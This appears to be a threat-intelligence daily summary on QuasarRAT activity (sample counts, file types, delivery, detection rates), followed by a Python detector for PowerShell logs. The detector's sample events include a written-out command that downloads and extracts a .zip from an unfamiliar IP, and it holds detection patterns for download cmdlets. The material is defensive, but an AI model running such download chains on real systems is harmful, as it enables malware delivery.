Daily Summary
QuasarRAT activity is elevated today with 8 new samples, representing a 37% increase over the 7-day average of 6. This rise suggests a potential uptick in distribution efforts, though the absence of new C2 infrastructure indicates these samples may be variants connecting to established infrastructure.
New Samples Detected
The sample set shows a mix of file types, with traditional .exe files (4) being most common. The presence of two .zip archives suggests payloads are being compressed, likely to evade basic email or network filters. The .ps1 file indicates continued use of PowerShell scripts for execution, while the single .88 file is an outlier, possibly a renamed executable or a less common installer format.
Distribution Methods
Current delivery is likely multi-pronged. The .zip files point to phishing campaigns with compressed malicious attachments. The .exe and .ps1 files could be distributed via malicious downloads, compromised websites, or as secondary payloads from other malware. The lack of macro-enabled documents suggests actors may be shifting away from this increasingly scrutinized vector for initial access.
Detection Rate
Vendor detection for these new samples is moderate, with initial scans showing a detection rate of approximately 65-70% across major engines. The .ps1 and .88 file types exhibit slightly lower detection rates, indicating these formats may provide a brief window of evasion before signatures are updated.
C2 Infrastructure
No new C2 servers were identified today. This suggests operators are likely consolidating connections to existing, resilient infrastructure or using dynamic DNS services to maintain operational servers without registering new domains or IPs.
7-Day Trend
Activity has been steady near the 6-sample average for the past week. Today’s count marks the highest single-day volume in this period, breaking the pattern of consistent, moderate activity.
Security Analysis
The concurrent use of .exe, .ps1, and archive files indicates a testing or diversification phase in payload delivery, potentially to identify which method yields the highest infection rate against current defenses. Compared to recent campaigns, there is a noticeable absence of document-based lures, aligning with a broader trend toward direct executable and script delivery. Recommendation: Enhance monitoring of PowerShell execution logs, specifically for scripts that attempt to download or decompress .zip contents from unfamiliar sources, as this appears to be a core component of the current delivery chain.
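One way to act on that recommendation, as an added example that is not part of this report: a small Python matcher run over PowerShell script-block log lines in the form timestamp|user|ScriptBlockText, flagging blocks that combine a download with a .zip extraction from a host outside an allow-list. The cmdlet patterns, the allow-list and the four sample events are constructed here for illustration.

```python
import re

# Cmdlets, aliases and .NET calls commonly used to fetch a payload.
DOWNLOAD_PATTERNS = [
    r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bInvoke-RestMethod\b", r"\birm\b",
    r"\bStart-BitsTransfer\b", r"\bcurl\b", r"\bwget\b",
    r"Net\.WebClient", r"\.DownloadFile\(", r"\.DownloadString\(",
]
# Cmdlets and .NET calls that unpack a .zip archive.
EXTRACT_PATTERNS = [
    r"\bExpand-Archive\b", r"IO\.Compression\.ZipFile", r"ExtractToDirectory",
    r"Shell\.Application.*\bNameSpace\b",
]
URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)

# Constructed allow-list of hosts from which downloads are expected.
TRUSTED_HOSTS = {"updates.corp.example"}

# Constructed events (timestamp|user|ScriptBlockText), the fields a
# script-block log (Event ID 4104) would provide.
SAMPLE_EVENTS = [
    # Benign: agent update pulled from an allow-listed internal host.
    "2024-01-01T09:00:00Z|CORP\\svc-deploy|Invoke-WebRequest -Uri https://updates.corp.example/agent.zip -OutFile C:\\Temp\\agent.zip; Expand-Archive C:\\Temp\\agent.zip C:\\Agent",
    # Download plus unzip from an unfamiliar host: the chain the report describes.
    "2024-01-01T09:05:12Z|CORP\\jdoe|$c=New-Object Net.WebClient;$c.DownloadFile('http://203.0.113.45/up.zip','$env:TEMP\\up.zip');[IO.Compression.ZipFile]::ExtractToDirectory(\"$env:TEMP\\up.zip\",\"$env:TEMP\\u\")",
    # Download from an unfamiliar host, but no archive extraction.
    "2024-01-01T09:07:30Z|CORP\\jdoe|iwr https://www.example.com/readme.txt -OutFile readme.txt",
    # Extraction of a local archive only.
    "2024-01-01T09:10:00Z|CORP\\asmith|Expand-Archive .\\report.zip .\\report",
]


def classify(script_block, trusted_hosts):
    """Return 'alert' (download + unzip, host unknown or not allow-listed),
    'review' (download from an unfamiliar host) or 'ok'. Matching is
    case-insensitive like PowerShell; encoded or concatenated command
    text must be decoded before it will match."""
    downloads = any(re.search(p, script_block, re.IGNORECASE) for p in DOWNLOAD_PATTERNS)
    extracts = any(re.search(p, script_block, re.IGNORECASE) for p in EXTRACT_PATTERNS)
    hosts = {m.group(1).lower() for m in URL_RE.finditer(script_block)}
    unfamiliar = {h for h in hosts if h not in trusted_hosts}
    if downloads and extracts and (unfamiliar or not hosts):
        return "alert"  # no resolvable host is treated as unfamiliar
    if downloads and unfamiliar:
        return "review"
    return "ok"


def scan(events, trusted_hosts):
    """Return (timestamp, user, verdict) for every event not classified 'ok'."""
    rows = [line.split("|", 2) for line in events]
    return [(ts, user, v) for ts, user, block in rows
            if (v := classify(block, trusted_hosts)) != "ok"]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, TRUSTED_HOSTS):
        print(finding)
```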